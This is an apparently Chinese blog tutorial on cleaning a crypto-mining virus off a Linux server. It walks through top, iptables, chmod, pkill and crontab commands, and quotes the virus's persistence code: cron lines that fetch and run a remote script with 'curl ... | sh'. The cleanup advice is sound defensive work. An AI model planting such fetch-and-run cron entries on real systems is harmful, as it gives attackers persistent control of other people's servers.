最近受类似于比特币及区块链技术的影响，有些云服务器被攻入，植入挖矿病毒，利用你的云服务器来挖矿。本文就阐述几个常用的linux命令，假如你碰到这样的病毒，这些linux命令可能会有些帮助。这些命令并不完全是删除挖矿病毒的一种方面，它们更多的是一种通用的解决问题的方法，不单单局限于挖矿病毒。

解决方法

本文以这个挖矿进程来举例

3798 root      20   0  386m 7852 1272 S 300.0  0.1   4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT

命令

top c(查看cpu，依照病毒进程占高CPU的特点找到病毒程序)

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP

iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP(关闭对挖矿服务器的进出口访问)

chmod -x minerd (改变挖矿程序的执行权限)

pkill minerd (杀死进程)

service stop crond 或者 crontab -r (删除所有的执行计划)

(以上内容可以说是通用的，想把某个CPU占用很高的进程禁止了，都能用，下面的内容可能是个性化的，仅针对于某个挖矿病毒)

因为病毒有这样的代码

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.***.com/pm.sh?0105008 | sh" > /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo "*/5 * * * * curl -fsSL http://www.***.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

所以

检查/var/spool/cron/目录下发现有个root用户的定时器文件

其命令为

cd /var/ spool/cron/

删除下载病毒的脚本文件 删除的命令为

rm 文件

挖矿病毒主要是利用了redis的一些漏洞获得服务器的访问权限，然后植入病毒，即使更新漏洞，另外，可以

vim ~/.ssh/authorized_keys

删除不认识的账号，可以查看自己的用户列表，删除不认识的用户。

如果读者只是为了解决问题，读到这里就可以了，下面内容给出各个命令的详细解释，各个参数的意义等，以便学习方法，解决更多类似的问题。

命令解析

命令1

top c(作用，查看CPU，可以看一些进程占用的CPU，如果某个进程几乎占用了所有的CPU，那么这个进程可能就是病毒)

比如输入这个命令以后，假如服务器中了挖矿病毒，就可以看到和上述例子差不多的内容。

top命令可以实时动态地查看系统的整体运行情况，是一个综合了多方信息监测系统性能和运行信息的实用工具。通过top命令所提供的互动式界面，用热键可以管理。

Top – 系统时间 up 系统已经运行的时间(天) 1 user：1个用户当前登录 load average：系统负载，即任务队列的平均长度 tasks 总进程数 2 running 正在运行的进程数 86 sleeping 睡眠的进程数 0 stopped 停止的进程数 0 zombie 冻结的进程数 %cpu cpu利用率 其中 us(用户空间占比)sy(内核空间占比)ni(用户进程空间内改变过优先级的进程占比)id(空闲占比)wa(等待输入输出CPU占比)

后面两行是内存和交换区的一些数据。

命令2

iptables 的相关命令(作用，关闭对挖矿服务器的访问)

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP

iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

解释一下这个命令，iptables是防火墙相关的命令，参数A是添加的意思，两句话的作用是添加防火墙规则，分别是入方向的和出方向的 -s -d 分别指的是源和目的中间的是挖矿服务器的地址 -j ACTION :指定如何进行处理这里的ACTION是DROP，关闭。

命令3

chmod (改变执行权限)

chmod -x minerd

参数x的作用是执行或切换权限。 这个命令的作用是 取消minerd的执行权限。

命令4

pkill (杀掉进程)

pkill minerd

Pkill就是杀掉进程的命令，这个命令很简单，不用更多的解释了。

命令5

service stop crond 或者 crontab -r (删除所有的执行计划)

crond是一个daemon，它每分钟wake up一次，按照crontab里定义的形式来执行任务。

crontab是一个表的概念，用于告诉crond以何种形式执行。

总结

本文介绍了某个挖矿病毒的清除方式，并详细解释了一些linux命令，更多的想介绍这些命令，讲一个通用的方法。病毒是不断变化的，您看到这篇文章的时候，可能这个病毒已经成为过去式了，但是这些linux命令是不变的，掌握这些命令的知识，可以先进行一个简单的处理，然后再根据病毒的个性，进行进一步的处理。

相关主题